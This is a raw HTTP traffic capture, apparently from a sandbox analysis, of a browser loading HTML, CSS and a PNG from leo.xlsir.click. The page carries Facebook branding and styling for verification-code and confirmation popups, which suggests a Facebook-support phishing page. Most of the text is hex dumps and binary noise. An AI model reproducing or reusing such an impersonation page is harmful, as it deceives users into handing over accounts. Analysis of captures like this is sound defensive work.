2024-05-27 22:35:16 UTC	652	IN	Data Raw: 38 63 33 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 75 70 70 6f 72 74 20 48 65 6c 70 20 43 6f 6e 74 61 63 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 75 70 70 6f 72 74 20 48 65 6c Data Ascii: 8c3<html lang="en"><head><meta name="robots" content="noindex"> <meta charset="utf-8"> <meta property="og:type" content="article"> <meta property="og:title" content="Support Help Contact"> <meta name="description" content="Support Hel
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 30 2e 32 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 45 56 53 54 51 4e 33 2f 61 7a 70 72 47 31 41 6e 6d 33 51 44 67 70 4a 4c 49 6d 39 4e 61 6f 30 59 7a 31 7a 74 63 51 54 77 46 73 70 64 33 79 44 36 35 56 6f 68 68 70 75 75 43 4f 6d 4c 41 53 6a 43 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 Data Ascii: f="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous"> <link rel="icon" href="https://static.xx.fbcdn.ne
2024-05-27 22:35:16 UTC	229	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 74 65 72 6d 73 3f 70 61 69 70 76 3d 30 26 61 6d 70 3b 65 61 76 3d 41 66 5a 2d 6e 30 72 46 5f 73 6c 33 47 50 37 34 79 75 59 71 63 4a 41 75 4d 6a 74 4e 70 54 48 66 55 63 6e 62 47 36 77 36 78 65 68 30 47 54 4c 77 4c 49 52 74 65 34 30 48 76 64 72 61 4b 7a 30 35 32 7a 30 26 61 6d 70 3b 5f 72 64 72 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 20 c2 a9 20 32 30 32 34 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: https://www.facebook.com/legal/terms?paipv=0&eav=AfZ-n0rF_sl3GP74yuYqcJAuMjtNpTHfUcnbG6w6xeh0GTLwLIRte40HvdraKz052z0&_rdr">Terms of Service 2024</a></div> </div> </div> </div></body></html>
2024-05-27 22:35:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:16 UTC	544	OUT	GET /css/main.02.css HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://leo.xlsir.click/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:16 UTC	801	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 22:35:16 GMT Content-Type: text/css Transfer-Encoding: chunked Connection: close last-modified: Sat, 18 May 2024 04:29:24 GMT vary: Accept-Encoding etag: W/"66482ea4-31cd" x-powered-by: DLEMP expires: Tue, 25 Jun 2024 18:17:45 GMT Cache-Control: public, max-age=2592000, must-revalidate, proxy-revalidate CF-Cache-Status: HIT Age: 101819 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlMCDV6Drehvk1GGFl16MEVlov40LKAKiWzEGnPglgwDGDZwxmGc9P1ZwnNHGNxJmlBP8SdmcAi%2F3Kq%2B3I4yln3hhlvM%2Bi1%2Bj%2BI7jQtHUOE7IT1pfPNxVmAK1xcBwkNeGss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a21dab043f7-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:16 UTC	568	IN	Data Raw: 33 31 63 64 0d 0a 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 61 72 72 6f 77 2c 2e 63 61 72 6f 75 73 65 6c 2e 63 61 72 6f 75 73 65 6c 2d 73 6c 69 64 65 72 20 2e 63 6f 6e 74 72 6f 6c 2d 61 72 72 6f 77 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 34 30 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 32 30 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 35 73 20 65 61 73 65 2d 69 6e 3b 7a 2d 69 6e 64 65 78 3a 32 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 61 72 72 6f 77 3a 66 6f Data Ascii: 31cd.carousel .control-arrow,.carousel.carousel-slider .control-arrow{background:none;border:0;cursor:pointer;filter:alpha(opacity=40);font-size:32px;opacity:.4;position:absolute;top:20px;transition:all .25s ease-in;z-index:2}.carousel .control-arrow:fo
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 3a 69 6e 68 65 72 69 74 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 70 72 65 76 2e 63 6f 6e 74 72 6f 6c 2d 61 72 72 6f 77 7b 6c 65 66 74 3a 30 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 70 72 65 76 2e 63 6f 6e 74 72 6f 6c 2d 61 72 72 6f 77 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 38 70 78 20 73 6f 6c 69 64 20 23 66 66 66 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 2e 63 6f 6e 74 72 6f 6c 2d 61 72 72 6f 77 7b 72 69 67 68 74 3a 30 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 2e 63 6f 6e 74 72 6f 6c 2d 61 72 72 Data Ascii: :inherit;display:none;filter:alpha(opacity=0);opacity:0}.carousel .control-prev.control-arrow{left:0}.carousel .control-prev.control-arrow:before{border-right:8px solid #fff}.carousel .control-next.control-arrow{right:0}.carousel .control-next.control-arr
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 30 2c 30 2c 30 2c 2e 32 29 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 73 6c 69 64 65 72 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 73 6c 69 64 65 72 2d 77 72 61 70 70 65 72 2e 61 78 69 73 2d 68 6f 72 69 7a 6f 6e 74 61 6c 20 2e 73 6c 69 64 65 72 7b 2d 6d 73 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 73 6c 69 64 65 72 2d 77 72 61 70 70 65 72 2e 61 78 69 73 2d 68 6f 72 69 7a 6f 6e 74 61 6c 20 Data Ascii: 0,0,0,.2)}.carousel .slider-wrapper{margin:auto;overflow:hidden;transition:height .15s ease-in;width:100%}.carousel .slider-wrapper.axis-horizontal .slider{-ms-box-orient:horizontal;display:-moz-flex;display:flex}.carousel .slider-wrapper.axis-horizontal
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 39 29 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 33 30 29 3b 68 65 69 67 68 74 3a 38 70 78 3b 6d 61 72 67 69 6e 3a 30 20 38 70 78 3b 6f 70 61 63 69 74 79 3a 2e 33 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 35 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 38 70 78 7d 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 64 6f 74 73 20 2e 64 6f 74 2e 73 65 6c 65 63 74 65 64 2c 2e 63 61 72 6f 75 73 65 6c 20 2e 63 6f 6e 74 72 6f 6c 2d 64 6f 74 73 20 2e 64 6f 74 3a 68 6f 76 65 72 7b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b Data Ascii: px rgba(0,0,0,.9);cursor:pointer;display:inline-block;filter:alpha(opacity=30);height:8px;margin:0 8px;opacity:.3;transition:opacity .25s ease-in;width:8px}.carousel .control-dots .dot.selected,.carousel .control-dots .dot:hover{filter:alpha(opacity=100);
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 31 35 70 78 20 30 3b 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 7d 2e 74 68 75 6d 6e 61 69 6c 20 2e 63 6f 6e 74 65 6e 74 20 2e 62 6f 74 74 6f 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 30 66 31 66 36 7d 2e 74 68 75 6d 6e 61 69 6c 20 2e 63 6f 6e 74 65 6e 74 20 2e 62 6f 74 74 6f 6d 20 70 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 31 30 70 78 7d 2e 6d 61 69 6e 20 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 62 75 74 74 6f 6e 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 35 37 34 65 61 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a Data Ascii: 15px 0;padding:0 10px}.thumnail .content .bottom{background-color:#f0f1f6}.thumnail .content .bottom p{margin:0;padding:20px 10px}.main .container .button{align-items:center;background:#2574ea;border-radius:5px;cursor:pointer;display:flex;justify-content:
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 62 75 73 69 6e 65 73 73 20 2e 66 6f 6f 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 30 38 30 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 37 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 21 69 6d Data Ascii: ont-weight:300;margin:0;padding-bottom:60px;padding-left:50px;padding-right:50px;text-align:center}.business .footer{background-color:#4080ff!important;margin-top:70px!important;padding-bottom:40px!important;padding-top:40px!important;text-align:center!im
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 30 38 34 66 34 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 70 78 3b 68 65 69 67 68 74 3a 38 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 38 70 78 7d 2e 62 75 73 69 6e 65 73 73 20 2e 66 6f 72 6d 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 2e 62 75 73 69 6e 65 73 73 20 2e 66 6f 72 6d 20 2e 66 6f 72 6d 2d 67 72 6f 75 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 62 75 73 69 6e 65 73 73 20 2e 66 6f 72 6d 20 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 37 64 37 65 38 32 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 6c 75 63 69 64 61 20 67 72 61 6e Data Ascii: ackground-color:#3084f4;border-radius:50px;height:8px;margin:auto;width:8px}.business .form strong{font-weight:bolder}.business .form .form-group{margin-bottom:1rem}.business .form label{color:#7d7e82;font-family:Helvetica Neue,Helvetica,Arial,lucida gran
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 6c 6f 73 65 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 69 74 69 61 6c 3b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 70 6f 70 75 70 20 2e 63 6c 6f 73 65 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 6f 70 61 63 69 74 79 3a 2e 35 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 30 20 23 66 66 66 7d 2e 70 6f 70 75 70 20 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 37 64 37 65 38 32 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 Data Ascii: lose{-webkit-appearance:none;appearance:none;background-color:initial;border:0;padding:0}.popup .close{color:#000;float:right;font-size:1.5rem;font-weight:700;line-height:1;opacity:.5;text-shadow:0 1px 0 #fff}.popup label{color:#7d7e82;font-family:Helveti
2024-05-27 22:35:16 UTC	1369	IN	Data Raw: 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 33 38 35 38 39 38 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 23 73 65 6e 64 63 6f 64 65 61 67 61 69 6e 2e 61 63 74 69 76 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 74 69 6d 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 74 69 6d 65 72 2e 61 63 74 69 76 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 6f 6e 66 69 72 6d 20 2e 66 6f 6f 74 65 72 69 69 7b 68 65 69 67 68 74 3a 35 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 Data Ascii: n{border:none;color:#385898;display:none;font-size:14px;font-weight:600;padding-left:10px;text-decoration:none}#sendcodeagain.active{display:block}#timer{padding-left:10px!important}#timer.active{display:none}.confirm .footerii{height:55px;padding:10px 20
2024-05-27 22:35:16 UTC	1237	IN	Data Raw: 31 29 29 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 32 70 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 37 70 78 20 30 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 2d 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 35 29 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 75 70 6c 6f 61 64 2d 69 6d 61 67 65 20 2e 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 75 70 6c 6f 61 64 2d 69 6d 61 67 65 20 2e 66 6f 6f 74 65 72 20 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 75 70 6c 6f 61 64 2d 69 6d 61 67 65 20 2e 66 6f 6f 74 65 72 20 61 7b 63 6f 6c 6f Data Ascii: 1));border:none;border-radius:5px;color:#fff;font-weight:700;margin-top:12px;outline:none;padding:7px 0;text-shadow:0 -1px rgba(0,0,0,.25);width:100%}.upload-image .footer{margin-top:20px}.upload-image .footer b{font-size:16px}.upload-image .footer a{colo

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:17 UTC	593	OUT	GET /images/banner1.png HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://leo.xlsir.click/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:17 UTC	795	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 22:35:17 GMT Content-Type: image/png Content-Length: 77583 Connection: close last-modified: Sat, 18 May 2024 04:30:24 GMT etag: "66482ee0-12f0f" x-powered-by: DLEMP expires: Tue, 25 Jun 2024 18:17:44 GMT Cache-Control: public, max-age=2592000, must-revalidate, proxy-revalidate CF-Cache-Status: HIT Age: 101821 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ik%2BvkzDmU3FLVKq9PUT7WyZhEGYnYg6yZWg34Ase64rcE4XO9qnm%2FQCksnzUwrOStjvesG7bBW7crx5ExSB%2FW%2BgoHeKv4zG1MlzNFWupfdErAh%2B1Yh9khu8uBuzRLbL3qfg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a2acf687c84-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:17 UTC	574	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 ab 00 00 01 5d 08 06 00 00 00 24 38 24 68 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 01 2e a4 49 44 41 54 78 01 ec fd 07 94 64 d9 79 1e 08 7e f7 b9 f0 91 3e cb 9b b6 d5 06 1e 0d 0f 12 de 1b 3a 89 a0 91 44 19 4a 33 1a ad 34 33 67 34 da b3 ab 39 7b b4 87 3a d2 48 bb da 19 d9 91 44 72 35 22 45 90 14 0d 48 02 04 01 a2 61 1b a6 1b 40 03 0d 34 da 77 79 9b de 84 7f ee ce ff df 7b 5f 44 64 64 56 55 56 55 66 55 64 e6 fd ba a3 32 33 e2 c5 b3 d7 7c f7 fb 9d f8 07 9f 95 12 16 16 16 16 16 16 16 16 16 16 43 08 07 16 16 16 16 16 16 16 16 16 16 43 0a 4b 56 2d 2c 2c 2c 2c 2c 2c 2c 2c 86 16 96 ac 5a 58 58 58 Data Ascii: PNGIHDR]$8$hpHYssRGBgAMAa.IDATxdy~>:DJ343g49{:HDr5"EHa@4wy{_DddVUVUfUd23\|CCKV-,,,,,,,,ZXXX
2024-05-27 22:35:17 UTC	1369	IN	Data Raw: 58 0c 2d 2c 59 b5 b0 b0 b0 b0 b0 b0 b0 b0 18 5a 58 b2 6a 61 61 61 61 61 61 61 61 31 b4 b0 64 d5 c2 c2 c2 c2 c2 c2 c2 c2 62 68 61 c9 aa 85 85 85 85 85 85 85 85 c5 d0 c2 92 55 0b 0b 0b 0b 0b 0b 0b 0b 8b a1 85 25 ab 16 16 16 16 16 16 16 16 16 43 0b 4b 56 2d 2c 2c 2c 2c 2c 2c 2c 2c 86 16 96 ac 5a 58 58 58 58 58 58 58 58 0c 2d 3c dc 66 c8 74 13 1b 09 fa 5f c0 c2 c2 c2 c2 c2 c2 c2 c2 62 8f c3 2a ab 16 16 16 16 16 16 16 16 16 43 0b 4b 56 2d 2c 2c 2c 2c 2c 2c 2c 2c 86 16 96 ac 5a 58 58 58 58 58 58 58 58 0c 2d 6e bb cf ea e6 21 37 b1 8d 75 6c b5 b0 b0 b0 b0 b0 b0 b0 d8 cd 18 52 65 75 33 44 d5 c2 c2 c2 c2 c2 c2 c2 c2 62 b7 c3 ba 01 58 58 58 58 58 58 58 58 58 0c 2d 2c 59 b5 b0 b0 b0 b0 b0 b0 b0 b0 18 5a 58 b2 6a 61 61 61 61 61 61 61 61 31 b4 b8 fd 01 56 62 33 9b f0 Data Ascii: X-,YZXjaaaaaaaa1dbhaU%CKV-,,,,,,,,ZXXXXXXXX-<ft_b*CKV-,,,,,,,,ZXXXXXXXX-n!7ulReu3DbXXXXXXXXX-,YZXjaaaaaaaa1Vb3
2024-05-27 22:35:17 UTC	1369	IN	Data Raw: 0c fe b2 d8 52 48 dd 56 7c 4f 28 97 95 56 b3 8d 0b 17 2e e1 cc e9 33 38 7b ee 34 6a b5 55 e5 c6 c2 0f 89 2d 0c c2 3c df 54 66 ea 2a b7 3e 97 76 43 ed 4c 46 a8 8c 14 30 3e 3e 89 fd d3 87 71 f0 d0 21 1c 38 b0 9f da 52 41 2f f4 84 40 af 43 4a 74 8d 1a c8 fa 81 85 85 85 c5 ed 81 f8 07 9f dd 8e a4 3d 16 bb 17 1b 35 97 0d 26 2e 69 4c f5 1b 7d a4 be a2 89 9e 52 37 a5 36 e1 27 89 50 6a 29 ff dd 6e 13 f9 24 96 da 21 85 b2 15 93 5a 1a 47 68 76 88 40 3a 01 99 d7 85 22 ac 8e f0 14 f9 64 52 a5 2d f6 86 30 66 c4 cc 04 4f 69 22 26 b4 39 d4 a8 a5 89 ec d1 69 29 7b a6 4f de 86 fd 53 93 38 d1 57 26 b4 62 29 b3 30 fd 8c c0 12 a3 4d cd 35 2a 3f 55 b1 f6 3e c8 ee 3f 9b 43 66 aa ed ff 92 70 32 d3 bf fe 4f 07 84 99 0c 03 44 68 05 bd a4 39 17 87 ec ba 8e 4f 3f 89 ae e7 88 d8 4e Data Ascii: RHV\|O(V.38{4jU-<Tf>vCLF0>>q!8RA/@CJt=5&.iL}R76'Pj)n$!ZGhv@:"dR-0fOi"&9i){OS8W&b)0M5?U>?Cfp2ODh9O?N
2024-05-27 22:35:17 UTC	1369	IN	Data Raw: 6c b5 1d 4b 84 6c c6 27 76 15 26 0e 11 55 8e 38 26 65 ce 71 88 70 09 ed ff 98 6a 72 db 23 5c 42 45 f6 33 09 4d 22 6d f6 d4 06 7b 9e 80 39 9a df 51 13 ad 31 4c eb 30 20 a7 47 e6 ba 67 9c ba eb c8 d0 de f6 af 93 1b 10 ea 8c 39 f6 ee 5f 16 f1 2d 4c 5a 2e ce 4c e0 90 39 d9 73 99 a4 c6 28 11 59 2d 16 3c 94 8a 1e 2a 15 9f 54 58 60 bc d0 27 de 39 fa a1 72 d5 2e 8f 9e 33 fb 51 2a 8e 6c fc 5e 33 b7 10 c5 a7 fb 54 59 d1 3b cb 3d f7 8c b4 57 47 8a 34 91 2a 09 1a 2f 1a da ad 10 f3 0b f3 98 99 9f c7 dc fc 1c 56 56 57 55 64 ff e2 dc 1c 75 b4 0e 0a f1 12 e2 c6 2c 5a f3 17 11 af 2c 12 93 25 f2 ea 34 b4 cf 6a 5f d7 5d d7 07 fa 86 fb 9e df 29 f7 cb 80 ee 3b af 52 0a f0 8b 65 e4 47 0e c2 ab 1c a2 f5 62 80 88 16 93 31 e7 b4 a0 e7 e6 17 8b 78 f8 c1 57 e0 91 d7 bf 01 e3 e3 e3 Data Ascii: lKl'v&U8&eqpjr#\BE3M"m{9Q1L0 Gg9_-LZ.L9s(Y-<TX`'9r.3Ql^3TY;=WG4*/VVWUdu,Z,%4j_]);ReGb1xW
